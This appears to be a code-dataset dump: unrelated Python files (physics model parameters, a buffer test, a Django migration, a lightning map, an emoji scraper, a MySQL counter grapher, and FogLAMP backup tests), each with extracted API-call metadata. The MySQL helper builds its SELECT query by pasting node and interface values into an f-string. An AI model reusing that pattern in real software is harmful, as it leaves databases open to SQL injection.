'cmath.sqrt(sw2)', texname='s_w')\n", (14021, 14109), False, 'from object_library import all_parameters, Parameter\n'), ((14181, 14268), 'object_library.Parameter', 'Parameter', ([], {'name': '"""g1"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""ee/cw"""', 'texname': '"""g_1"""'}), "(name='g1', nature='internal', type='real', value='ee/cw', texname\n ='g_1')\n", (14190, 14268), False, 'from object_library import all_parameters, Parameter\n'), ((14340, 14427), 'object_library.Parameter', 'Parameter', ([], {'name': '"""gw"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""ee/sw"""', 'texname': '"""g_w"""'}), "(name='gw', nature='internal', type='real', value='ee/sw', texname\n ='g_w')\n", (14349, 14427), False, 'from object_library import all_parameters, Parameter\n'), ((14500, 14602), 'object_library.Parameter', 'Parameter', ([], {'name': '"""vev"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""(2*MW*sw)/ee"""', 'texname': '"""\\\\text{vev}"""'}), "(name='vev', nature='internal', type='real', value='(2*MW*sw)/ee',\n texname='\\\\text{vev}')\n", (14509, 14602), False, 'from object_library import all_parameters, Parameter\n'), ((14680, 14806), 'object_library.Parameter', 'Parameter', ([], {'name': '"""mfi"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""cmath.sqrt(100 - (kq*vev**2)/2.)"""', 'texname': '"""M_{\\\\text{fi}}"""'}), "(name='mfi', nature='internal', type='real', value=\n 'cmath.sqrt(100 - (kq*vev**2)/2.)', texname='M_{\\\\text{fi}}')\n", (14689, 14806), False, 'from object_library import all_parameters, Parameter\n'), ((14882, 15231), 'object_library.Parameter', 'Parameter', ([], {'name': '"""AH"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""(47*ee**2*(1 - (2*MH**4)/(987.*MT**4) - (14*MH**2)/(705.*MT**2) + (213*MH**12)/(2.634632e7*MW**12) + (5*MH**10)/(119756.*MW**10) + (41*MH**8)/(180950.*MW**8) + (87*MH**6)/(65800.*MW**6) + (57*MH**4)/(6580.*MW**4) + (33*MH**2)/(470.*MW**2)))/(72.*cmath.pi**2*vev)"""', 'texname': '"""A_H"""'}), "(name='AH', nature='internal', type='real', value=\n '(47*ee**2*(1 - (2*MH**4)/(987.*MT**4) - (14*MH**2)/(705.*MT**2) + (213*MH**12)/(2.634632e7*MW**12) + (5*MH**10)/(119756.*MW**10) + (41*MH**8)/(180950.*MW**8) + (87*MH**6)/(65800.*MW**6) + (57*MH**4)/(6580.*MW**4) + (33*MH**2)/(470.*MW**2)))/(72.*cmath.pi**2*vev)'\n , texname='A_H')\n", (14891, 15231), False, 'from object_library import all_parameters, Parameter\n'), ((15298, 15492), 'object_library.Parameter', 'Parameter', ([], {'name': '"""GH"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""-(G**2*(1 + (13*MH**6)/(16800.*MT**6) + MH**4/(168.*MT**4) + (7*MH**2)/(120.*MT**2)))/(12.*cmath.pi**2*vev)"""', 'texname': '"""G_H"""'}), "(name='GH', nature='internal', type='real', value=\n '-(G**2*(1 + (13*MH**6)/(16800.*MT**6) + MH**4/(168.*MT**4) + (7*MH**2)/(120.*MT**2)))/(12.*cmath.pi**2*vev)'\n , texname='G_H')\n", (15307, 15492), False, 'from object_library import all_parameters, Parameter\n'), ((15561, 15743), 'object_library.Parameter', 'Parameter', ([], {'name': '"""Gphi"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""-(G**2*(1 + MH**6/(560.*MT**6) + MH**4/(90.*MT**4) + MH**2/(12.*MT**2)))/(8.*cmath.pi**2*vev)"""', 'texname': '"""G_h"""'}), "(name='Gphi', nature='internal', type='real', value=\n '-(G**2*(1 + MH**6/(560.*MT**6) + MH**4/(90.*MT**4) + MH**2/(12.*MT**2)))/(8.*cmath.pi**2*vev)'\n , texname='G_h')\n", (15570, 15743), False, 'from object_library import all_parameters, Parameter\n'), ((15819, 15927), 'object_library.Parameter', 'Parameter', ([], {'name': '"""lam"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""MH**2/(2.*vev**2)"""', 'texname': '"""\\\\text{lam}"""'}), "(name='lam', nature='internal', type='real', value=\n 'MH**2/(2.*vev**2)', texname='\\\\text{lam}')\n", (15828, 15927), False, 'from object_library import all_parameters, Parameter\n'), ((16003, 16115), 'object_library.Parameter', 'Parameter', ([], {'name': '"""yb"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""(ymb*cmath.sqrt(2))/vev"""', 'texname': '"""\\\\text{yb}"""'}), "(name='yb', nature='internal', type='real', value=\n '(ymb*cmath.sqrt(2))/vev', texname='\\\\text{yb}')\n", (16012, 16115), False, 'from object_library import all_parameters, Parameter\n'), ((16187, 16299), 'object_library.Parameter', 'Parameter', ([], {'name': '"""yc"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""(ymc*cmath.sqrt(2))/vev"""', 'texname': '"""\\\\text{yc}"""'}), "(name='yc', nature='internal', type='real', value=\n '(ymc*cmath.sqrt(2))/vev', texname='\\\\text{yc}')\n", (16196, 16299), False, 'from object_library import all_parameters, Parameter\n'), ((16372, 16487), 'object_library.Parameter', 'Parameter', ([], {'name': '"""ydo"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""(ymdo*cmath.sqrt(2))/vev"""', 'texname': '"""\\\\text{ydo}"""'}), "(name='ydo', nature='internal', type='real', value=\n '(ymdo*cmath.sqrt(2))/vev', texname='\\\\text{ydo}')\n", (16381, 16487), False, 'from object_library import all_parameters, Parameter\n'), ((16563, 16675), 'object_library.Parameter', 'Parameter', ([], {'name': '"""ye"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""(yme*cmath.sqrt(2))/vev"""', 'texname': '"""\\\\text{ye}"""'}), "(name='ye', nature='internal', type='real', value=\n '(yme*cmath.sqrt(2))/vev', texname='\\\\text{ye}')\n", (16572, 16675), False, 'from object_library import all_parameters, Parameter\n'), ((16747, 16859), 'object_library.Parameter', 'Parameter', ([], {'name': '"""ym"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""(ymm*cmath.sqrt(2))/vev"""', 'texname': '"""\\\\text{ym}"""'}), "(name='ym', nature='internal', type='real', value=\n '(ymm*cmath.sqrt(2))/vev', texname='\\\\text{ym}')\n", (16756, 16859), False, 'from object_library import all_parameters, Parameter\n'), ((16931, 17043), 'object_library.Parameter', 'Parameter', ([], {'name': '"""ys"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""(yms*cmath.sqrt(2))/vev"""', 'texname': '"""\\\\text{ys}"""'}), "(name='ys', nature='internal', type='real', value=\n '(yms*cmath.sqrt(2))/vev', texname='\\\\text{ys}')\n", (16940, 17043), False, 'from object_library import all_parameters, Parameter\n'), ((17115, 17227), 'object_library.Parameter', 'Parameter', ([], {'name': '"""yt"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""(ymt*cmath.sqrt(2))/vev"""', 'texname': '"""\\\\text{yt}"""'}), "(name='yt', nature='internal', type='real', value=\n '(ymt*cmath.sqrt(2))/vev', texname='\\\\text{yt}')\n", (17124, 17227), False, 'from object_library import all_parameters, Parameter\n'), ((17301, 17419), 'object_library.Parameter', 'Parameter', ([], {'name': '"""ytau"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""(ymtau*cmath.sqrt(2))/vev"""', 'texname': '"""\\\\text{ytau}"""'}), "(name='ytau', nature='internal', type='real', value=\n '(ymtau*cmath.sqrt(2))/vev', texname='\\\\text{ytau}')\n", (17310, 17419), False, 'from object_library import all_parameters, Parameter\n'), ((17500, 17615), 'object_library.Parameter', 'Parameter', ([], {'name': '"""yup"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""(ymup*cmath.sqrt(2))/vev"""', 'texname': '"""\\\\text{yup}"""'}), "(name='yup', nature='internal', type='real', value=\n '(ymup*cmath.sqrt(2))/vev', texname='\\\\text{yup}')\n", (17509, 17615), False, 'from object_library import all_parameters, Parameter\n'), ((17692, 17798), 'object_library.Parameter', 'Parameter', ([], {'name': '"""muH"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""cmath.sqrt(lam*vev**2)"""', 'texname': '"""\\\\mu"""'}), "(name='muH', nature='internal', type='real', value=\n 'cmath.sqrt(lam*vev**2)', texname='\\\\mu')\n", (17701, 17798), False, 'from object_library import all_parameters, Parameter\n')] |
from cspatterns.datastructures import buffer
def test_circular_buffer():
b = buffer.CircularBuffer(2, ['n'])
assert len(b.next) == 2
assert b.n is None
b = buffer.CircularBuffer.create(2, attrs=['n', 'fib'])
curr = b
out = [0, 1, ]
curr.prev[-2].n = 0
curr.prev[-2].fib = 1
curr.prev[-1].n = 1
curr.prev[-1].fib = 1
# we are going to calculate fibonacci
while curr.prev[-1].n < 12:
curr.n = curr.prev[-1].n + 1
curr.fib = curr.prev[-1].fib + curr.prev[-2].fib
out.append(curr.fib)
curr = curr.next[1]
assert out == [0, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233] | [
"cspatterns.datastructures.buffer.CircularBuffer",
"cspatterns.datastructures.buffer.CircularBuffer.create"
]
| [((82, 113), 'cspatterns.datastructures.buffer.CircularBuffer', 'buffer.CircularBuffer', (['(2)', "['n']"], {}), "(2, ['n'])\n", (103, 113), False, 'from cspatterns.datastructures import buffer\n'), ((174, 225), 'cspatterns.datastructures.buffer.CircularBuffer.create', 'buffer.CircularBuffer.create', (['(2)'], {'attrs': "['n', 'fib']"}), "(2, attrs=['n', 'fib'])\n", (202, 225), False, 'from cspatterns.datastructures import buffer\n')] |
# Generated by Django 2.1.7 on 2019-02-17 14:50
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='RedactedClientConfig',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.TextField()),
('password', models.TextField()),
('cookies', models.TextField(null=True)),
('authkey', models.TextField(null=True)),
('passkey', models.TextField(null=True)),
('last_login_failed', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='RedactedThrottledRequest',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('datetime', models.DateTimeField()),
('url', models.CharField(max_length=2048)),
],
options={
'abstract': False,
},
),
]
| [
"django.db.models.TextField",
"django.db.models.BooleanField",
"django.db.models.AutoField",
"django.db.models.DateTimeField",
"django.db.models.CharField"
]
| [((316, 409), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (332, 409), False, 'from django.db import migrations, models\n'), ((437, 455), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (453, 455), False, 'from django.db import migrations, models\n'), ((487, 505), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (503, 505), False, 'from django.db import migrations, models\n'), ((536, 563), 'django.db.models.TextField', 'models.TextField', ([], {'null': '(True)'}), '(null=True)\n', (552, 563), False, 'from django.db import migrations, models\n'), ((594, 621), 'django.db.models.TextField', 'models.TextField', ([], {'null': '(True)'}), '(null=True)\n', (610, 621), False, 'from django.db import migrations, models\n'), ((652, 679), 'django.db.models.TextField', 'models.TextField', ([], {'null': '(True)'}), '(null=True)\n', (668, 679), False, 'from django.db import migrations, models\n'), ((720, 754), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (739, 754), False, 'from django.db import migrations, models\n'), ((904, 997), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (920, 997), False, 'from django.db import migrations, models\n'), ((1025, 1047), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {}), '()\n', (1045, 1047), False, 'from django.db import migrations, models\n'), ((1074, 1107), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(2048)'}), '(max_length=2048)\n', (1090, 1107), False, 'from django.db import migrations, models\n')] |
from mpl_toolkits.basemap import Basemap
import matplotlib.pyplot as plt
import matplotlib.colors as colors
from numpy import array
from numpy import max
map = Basemap(llcrnrlon=-0.5,llcrnrlat=39.8,urcrnrlon=4.,urcrnrlat=43.,
resolution='i', projection='tmerc', lat_0 = 39.5, lon_0 = 1)
map.readshapefile('../sample_files/lightnings', 'lightnings')
x = []
y = []
c = []
for info, lightning in zip(map.lightnings_info, map.lightnings):
x.append(lightning[0])
y.append(lightning[1])
if float(info['amplitude']) < 0:
c.append(-1 * float(info['amplitude']))
else:
c.append(float(info['amplitude']))
plt.figure(0)
map.drawcoastlines()
map.readshapefile('../sample_files/comarques', 'comarques')
map.hexbin(array(x), array(y))
map.colorbar(location='bottom')
plt.figure(1)
map.drawcoastlines()
map.readshapefile('../sample_files/comarques', 'comarques')
map.hexbin(array(x), array(y), gridsize=20, mincnt=1, cmap='summer', bins='log')
map.colorbar(location='bottom', format='%.1f', label='log(# lightnings)')
plt.figure(2)
map.drawcoastlines()
map.readshapefile('../sample_files/comarques', 'comarques')
map.hexbin(array(x), array(y), gridsize=20, mincnt=1, cmap='summer', norm=colors.LogNorm())
cb = map.colorbar(location='bottom', format='%d', label='# lightnings')
cb.set_ticks([1, 5, 10, 15, 20, 25, 30])
cb.set_ticklabels([1, 5, 10, 15, 20, 25, 30])
plt.figure(3)
map.drawcoastlines()
map.readshapefile('../sample_files/comarques', 'comarques')
map.hexbin(array(x), array(y), C = array(c), reduce_C_function = max, gridsize=20, mincnt=1, cmap='YlOrBr', linewidths=0.5, edgecolors='k')
map.colorbar(location='bottom', label='Mean amplitude (kA)')
plt.show() | [
"matplotlib.pyplot.show",
"numpy.array",
"mpl_toolkits.basemap.Basemap",
"matplotlib.pyplot.figure",
"matplotlib.colors.LogNorm"
]
| [((162, 293), 'mpl_toolkits.basemap.Basemap', 'Basemap', ([], {'llcrnrlon': '(-0.5)', 'llcrnrlat': '(39.8)', 'urcrnrlon': '(4.0)', 'urcrnrlat': '(43.0)', 'resolution': '"""i"""', 'projection': '"""tmerc"""', 'lat_0': '(39.5)', 'lon_0': '(1)'}), "(llcrnrlon=-0.5, llcrnrlat=39.8, urcrnrlon=4.0, urcrnrlat=43.0,\n resolution='i', projection='tmerc', lat_0=39.5, lon_0=1)\n", (169, 293), False, 'from mpl_toolkits.basemap import Basemap\n'), ((656, 669), 'matplotlib.pyplot.figure', 'plt.figure', (['(0)'], {}), '(0)\n', (666, 669), True, 'import matplotlib.pyplot as plt\n'), ((820, 833), 'matplotlib.pyplot.figure', 'plt.figure', (['(1)'], {}), '(1)\n', (830, 833), True, 'import matplotlib.pyplot as plt\n'), ((1076, 1089), 'matplotlib.pyplot.figure', 'plt.figure', (['(2)'], {}), '(2)\n', (1086, 1089), True, 'import matplotlib.pyplot as plt\n'), ((1430, 1443), 'matplotlib.pyplot.figure', 'plt.figure', (['(3)'], {}), '(3)\n', (1440, 1443), True, 'import matplotlib.pyplot as plt\n'), ((1731, 1741), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1739, 1741), True, 'import matplotlib.pyplot as plt\n'), ((764, 772), 'numpy.array', 'array', (['x'], {}), '(x)\n', (769, 772), False, 'from numpy import array\n'), ((774, 782), 'numpy.array', 'array', (['y'], {}), '(y)\n', (779, 782), False, 'from numpy import array\n'), ((928, 936), 'numpy.array', 'array', (['x'], {}), '(x)\n', (933, 936), False, 'from numpy import array\n'), ((938, 946), 'numpy.array', 'array', (['y'], {}), '(y)\n', (943, 946), False, 'from numpy import array\n'), ((1184, 1192), 'numpy.array', 'array', (['x'], {}), '(x)\n', (1189, 1192), False, 'from numpy import array\n'), ((1194, 1202), 'numpy.array', 'array', (['y'], {}), '(y)\n', (1199, 1202), False, 'from numpy import array\n'), ((1538, 1546), 'numpy.array', 'array', (['x'], {}), '(x)\n', (1543, 1546), False, 'from numpy import array\n'), ((1548, 1556), 'numpy.array', 'array', (['y'], {}), '(y)\n', (1553, 1556), False, 'from numpy import array\n'), ((1247, 1263), 'matplotlib.colors.LogNorm', 'colors.LogNorm', ([], {}), '()\n', (1261, 1263), True, 'import matplotlib.colors as colors\n'), ((1562, 1570), 'numpy.array', 'array', (['c'], {}), '(c)\n', (1567, 1570), False, 'from numpy import array\n')] |
import html
from collections import namedtuple
from pathlib import Path
from typing import List, Dict
import requests
from bs4 import BeautifulSoup
from lxml import etree
from lxml.etree import XPath
Emoji = namedtuple('Emoji', 'char name')
class EmojiExtractor(object):
def __init__(self):
self.all_emojis = self.fetch_emoji_list()
self.annotations = self.fetch_annotations()
self.base_emojis = self.fetch_base_emojis()
def fetch_emoji_list(self: 'EmojiExtractor') -> List[Emoji]:
print('Downloading list of all emojis')
data = requests.get(
'https://unicode.org/emoji/charts-14.0/full-emoji-list.html',
timeout=120
) # type: requests.Response
html = BeautifulSoup(data.text, 'lxml')
emojis = []
for row in html.find('table').find_all('tr'):
if not row.th:
emoji = row.find('td', {'class': 'chars'}).string
description = row.find('td', {'class': 'name'}).string.replace('⊛ ', '')
emojis.append(Emoji(emoji, description))
return emojis
def fetch_annotations(self: 'EmojiExtractor') -> Dict[chr, List[str]]:
print('Downloading annotations')
data = requests.get(
'https://raw.githubusercontent.com/unicode-org/cldr/latest/common/annotations/en.xml',
timeout=60
) # type: requests.Response
xpath = XPath('./annotations/annotation[not(@type="tts")]')
return {element.get('cp'): element.text.split(' | ')
for element in xpath(etree.fromstring(data.content))}
def fetch_base_emojis(self: 'EmojiExtractor') -> List[chr]:
print('Downloading list of human emojis...')
data = requests.get(
'https://unicode.org/Public/14.0.0/ucd/emoji/emoji-data.txt',
timeout=60
) # type: requests.Response
started = False
emojis = []
for line in data.text.split('\n'):
if not started and line != '# All omitted code points have Emoji_Modifier_Base=No ':
continue
started = True
if line == '# Total elements: 132':
break
if line and not line.startswith('#'):
emojis.extend(self.resolve_character_range(line.split(';')[0].strip()))
return emojis
def resolve_character_range(self, line: str) -> List[str]:
try:
(start, end) = line.split('..')
return [chr(char) for char in range(int(start, 16), int(end, 16) + 1)]
except ValueError:
return [self.resolve_character(line)]
def resolve_character(self, string: str) -> str:
return "".join(chr(int(character, 16)) for character in string.split(' '))
def write_symbol_file(self: 'EmojiExtractor'):
print('Writing collected emojis to symbol file')
with Path('../picker/data/emojis.csv').open('w') as symbol_file:
for entry in self.compile_entries(self.all_emojis):
symbol_file.write(entry + "\n")
def compile_entries(self: 'EmojiExtractor', emojis: List[Emoji]) -> List[str]:
annotated_emojis = []
for emoji in emojis:
entry = f"{emoji.char} {html.escape(emoji.name)}"
if emoji.char in self.annotations:
entry += f" <small>({html.escape(', '.join([annotation for annotation in self.annotations[emoji.char] if annotation != emoji.name]))})</small>"
annotated_emojis.append(entry)
return annotated_emojis
def write_metadata_file(self: 'EmojiExtractor'):
print('Writing metadata to metadata file')
with Path('../picker/copyme.py').open('w') as metadata_file:
metadata_file.write('skin_tone_selectable_emojis={\'')
metadata_file.write('\', \''.join(self.base_emojis))
metadata_file.write('\'}\n')
def extract(self: 'EmojiExtractor'):
self.write_symbol_file()
self.write_metadata_file()
| [
"collections.namedtuple",
"lxml.etree.XPath",
"pathlib.Path",
"requests.get",
"html.find",
"bs4.BeautifulSoup",
"lxml.etree.fromstring",
"html.escape"
]
| [((210, 242), 'collections.namedtuple', 'namedtuple', (['"""Emoji"""', '"""char name"""'], {}), "('Emoji', 'char name')\n", (220, 242), False, 'from collections import namedtuple\n'), ((584, 675), 'requests.get', 'requests.get', (['"""https://unicode.org/emoji/charts-14.0/full-emoji-list.html"""'], {'timeout': '(120)'}), "('https://unicode.org/emoji/charts-14.0/full-emoji-list.html',\n timeout=120)\n", (596, 675), False, 'import requests\n'), ((749, 781), 'bs4.BeautifulSoup', 'BeautifulSoup', (['data.text', '"""lxml"""'], {}), "(data.text, 'lxml')\n", (762, 781), False, 'from bs4 import BeautifulSoup\n'), ((1252, 1373), 'requests.get', 'requests.get', (['"""https://raw.githubusercontent.com/unicode-org/cldr/latest/common/annotations/en.xml"""'], {'timeout': '(60)'}), "(\n 'https://raw.githubusercontent.com/unicode-org/cldr/latest/common/annotations/en.xml'\n , timeout=60)\n", (1264, 1373), False, 'import requests\n'), ((1442, 1493), 'lxml.etree.XPath', 'XPath', (['"""./annotations/annotation[not(@type="tts")]"""'], {}), '(\'./annotations/annotation[not(@type="tts")]\')\n', (1447, 1493), False, 'from lxml.etree import XPath\n'), ((1759, 1849), 'requests.get', 'requests.get', (['"""https://unicode.org/Public/14.0.0/ucd/emoji/emoji-data.txt"""'], {'timeout': '(60)'}), "('https://unicode.org/Public/14.0.0/ucd/emoji/emoji-data.txt',\n timeout=60)\n", (1771, 1849), False, 'import requests\n'), ((822, 840), 'html.find', 'html.find', (['"""table"""'], {}), "('table')\n", (831, 840), False, 'import html\n'), ((1592, 1622), 'lxml.etree.fromstring', 'etree.fromstring', (['data.content'], {}), '(data.content)\n', (1608, 1622), False, 'from lxml import etree\n'), ((2915, 2948), 'pathlib.Path', 'Path', (['"""../picker/data/emojis.csv"""'], {}), "('../picker/data/emojis.csv')\n", (2919, 2948), False, 'from pathlib import Path\n'), ((3266, 3289), 'html.escape', 'html.escape', (['emoji.name'], {}), '(emoji.name)\n', (3277, 3289), False, 'import html\n'), ((3692, 3719), 'pathlib.Path', 'Path', (['"""../picker/copyme.py"""'], {}), "('../picker/copyme.py')\n", (3696, 3719), False, 'from pathlib import Path\n')] |
#!/usr/bin/env python3
"""
@author: <NAME>
MySql Parser for graphical presentation
"""
import mysql.connector
import datetime
from mysql.connector import Error
from datetime import datetime, timedelta
import json
class sql_graph_info():
def __init__(self, node, interface, time, sql_creds, db):
"""
Initializer for the sql_graph_info Object.
"""
self.node = node
self.interface = interface
self.time = time
self.sql_creds = sql_creds
self.db = db
def db_pull(self, node, interface, time, ):
""" Pulls the RX and TX information from the database
to display for the graphs page.
Arguments:
node [str] -- The node that holds the interface which
is to presented.
interface [str] -- The interface in which the counter
information will be based off of.
time [str] -- Time ranging from 30 minutes to 10 Years
Returns:
dict -- containing arrays of the counter values at
their coresponding timestamp.
"""
data_end = datetime.now()
if time == '1':
data_start = datetime.now() - timedelta(hours=0, minutes=30)
elif time == '2':
data_start = datetime.now() - timedelta(hours=1)
elif time == '3':
data_start = datetime.now() - timedelta(hours=2)
elif time == '4':
data_start = datetime.now() - timedelta(hours=6)
elif time == '5':
data_start = datetime.now() - timedelta(days=1)
else:
data_start = datetime.now() - timedelta(days=3650)
data_end.strftime('%Y-%m-%d %H:%M:%S')
data_start.strftime('%Y-%m-%d %H:%M:%S')
node_st = "openflow" + node
query = (
f"SELECT timestamp, Rx_pckts, Tx_pckts, Rx_drops, Tx_drops "
f"FROM {node_st}_counters WHERE "
f"Interface='openflow:{node}:{interface}'"
f"AND timestamp >= '{data_start}'"
f"AND timestamp < '{data_end}'"
)
mydb = mysql.connector.connect(
host=self.sql_creds['host'],
user=self.sql_creds['user'],
passwd=self.sql_creds['password'],
database=self.db
)
cur = mydb.cursor()
cur.execute(query)
response = cur.fetchall()
graphPoints = []
displayPoints = []
dataPointDict = {}
for dataPoint in response:
date = str(dataPoint[0])
rx_count = int(dataPoint[1])
tx_count = int(dataPoint[2])
rx_drops = int(dataPoint[3])
tx_drops = int(dataPoint[4])
if dataPointDict:
old_rx_c = int(dataPointDict['rx_count'])
old_tx_c = int(dataPointDict["tx_count"])
old_rx_d = int(dataPointDict["rx_drops"])
old_tx_d = int(dataPointDict["tx_drops"])
dif_rx_c = rx_count - old_rx_c
dif_tx_c = tx_count - old_tx_c
dif_rx_d = rx_drops - old_rx_d
dif_tx_d = tx_drops - old_tx_d
difDict = {"date": date, "rx_count": dif_rx_c,
"tx_count": dif_tx_c,
"rx_drops": dif_rx_d,
"tx_drops": dif_tx_d}
displayPoints.append(difDict)
dataPointDict = {"date": date, "rx_count": rx_count,
"tx_count": tx_count, "rx_drops": rx_drops,
"tx_drops": tx_drops}
graphPoints.append(dataPointDict)
return displayPoints
| [
"datetime.datetime.now",
"datetime.timedelta"
]
| [((1161, 1175), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1173, 1175), False, 'from datetime import datetime, timedelta\n'), ((1225, 1239), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1237, 1239), False, 'from datetime import datetime, timedelta\n'), ((1242, 1272), 'datetime.timedelta', 'timedelta', ([], {'hours': '(0)', 'minutes': '(30)'}), '(hours=0, minutes=30)\n', (1251, 1272), False, 'from datetime import datetime, timedelta\n'), ((1324, 1338), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1336, 1338), False, 'from datetime import datetime, timedelta\n'), ((1341, 1359), 'datetime.timedelta', 'timedelta', ([], {'hours': '(1)'}), '(hours=1)\n', (1350, 1359), False, 'from datetime import datetime, timedelta\n'), ((1411, 1425), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1423, 1425), False, 'from datetime import datetime, timedelta\n'), ((1428, 1446), 'datetime.timedelta', 'timedelta', ([], {'hours': '(2)'}), '(hours=2)\n', (1437, 1446), False, 'from datetime import datetime, timedelta\n'), ((1498, 1512), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1510, 1512), False, 'from datetime import datetime, timedelta\n'), ((1515, 1533), 'datetime.timedelta', 'timedelta', ([], {'hours': '(6)'}), '(hours=6)\n', (1524, 1533), False, 'from datetime import datetime, timedelta\n'), ((1585, 1599), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1597, 1599), False, 'from datetime import datetime, timedelta\n'), ((1602, 1619), 'datetime.timedelta', 'timedelta', ([], {'days': '(1)'}), '(days=1)\n', (1611, 1619), False, 'from datetime import datetime, timedelta\n'), ((1659, 1673), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1671, 1673), False, 'from datetime import datetime, timedelta\n'), ((1676, 1696), 'datetime.timedelta', 'timedelta', ([], {'days': '(3650)'}), '(days=3650)\n', (1685, 1696), False, 'from datetime import datetime, timedelta\n')] |
# test_fluxqubit.py
# meant to be run with 'pytest'
#
# This file is part of scqubits.
#
# Copyright (c) 2019 and later, <NAME> and <NAME>
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
############################################################################
import numpy as np
from scqubits import FluxQubit
from scqubits.tests.conftest import StandardTests
class TestFluxQubit(StandardTests):
@classmethod
def setup_class(cls):
cls.qbt = None
cls.qbt_type = FluxQubit
cls.file_str = "fluxqubit"
cls.op1_str = "n_1_operator"
cls.op2_str = "n_2_operator"
cls.param_name = "flux"
cls.param_list = np.linspace(0.45, 0.55, 50)
| [
"numpy.linspace"
]
| [((788, 815), 'numpy.linspace', 'np.linspace', (['(0.45)', '(0.55)', '(50)'], {}), '(0.45, 0.55, 50)\n', (799, 815), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
# FOGLAMP_BEGIN
# See: http://foglamp.readthedocs.io/
# FOGLAMP_END
import os
import asyncio
import json
from unittest.mock import MagicMock, patch
from collections import Counter
from aiohttp import web
import pytest
from foglamp.services.core import routes
from foglamp.services.core import connect
from foglamp.plugins.storage.common.backup import Backup
from foglamp.plugins.storage.common.restore import Restore
from foglamp.plugins.storage.common import exceptions
from foglamp.services.core.api import backup_restore
from foglamp.common.storage_client.storage_client import StorageClientAsync
__author__ = "<NAME>"
__copyright__ = "Copyright (c) 2017 OSIsoft, LLC"
__license__ = "Apache 2.0"
__version__ = "${VERSION}"
@asyncio.coroutine
def mock_coro(*args, **kwargs):
if len(args) > 0:
return args[0]
else:
return ""
@pytest.allure.feature("unit")
@pytest.allure.story("api", "backup")
class TestBackup:
"""Unit test the Backup functionality
"""
@pytest.fixture
def client(self, loop, test_client):
app = web.Application(loop=loop)
# fill the routes table
routes.setup(app)
return loop.run_until_complete(test_client(app))
@pytest.mark.parametrize("input_data, expected", [
(1, "RUNNING"),
(2, "COMPLETED"),
(3, "CANCELED"),
(4, "INTERRUPTED"),
(5, "FAILED"),
(6, "RESTORED"),
(7, "UNKNOWN")
])
def test_get_status(self, input_data, expected):
assert expected == backup_restore._get_status(input_data)
@pytest.mark.parametrize("request_params", [
'',
'?limit=1',
'?skip=1',
'?status=completed',
'?status=failed',
'?status=restored&skip=10',
'?status=running&limit=1',
'?status=canceled&limit=10&skip=0',
'?status=interrupted&limit=&skip=',
'?status=&limit=&skip='
])
async def test_get_backups(self, client, request_params):
storage_client_mock = MagicMock(StorageClientAsync)
response = [{'file_name': '1.dump',
'id': 1, 'type': '1', 'status': '2',
'ts': '2018-02-15 15:18:41.821978+05:30',
'exit_code': '0'}]
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(Backup, 'get_all_backups', return_value=mock_coro(response)):
resp = await client.get('/foglamp/backup{}'.format(request_params))
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert 1 == len(json_response['backups'])
assert Counter({"id", "date", "status"}) == Counter(json_response['backups'][0].keys())
@pytest.mark.parametrize("request_params, response_code, response_message", [
('?limit=invalid', 400, "Limit must be a positive integer"),
('?limit=-1', 400, "Limit must be a positive integer"),
('?skip=invalid', 400, "Skip/Offset must be a positive integer"),
('?skip=-1', 400, "Skip/Offset must be a positive integer"),
('?status=BLA', 400, "'BLA' is not a valid status")
])
async def test_get_backups_bad_data(self, client, request_params, response_code, response_message):
resp = await client.get('/foglamp/backup{}'.format(request_params))
assert response_code == resp.status
assert response_message == resp.reason
async def test_get_backups_exceptions(self, client):
with patch.object(connect, 'get_storage_async', return_value=Exception):
resp = await client.get('/foglamp/backup')
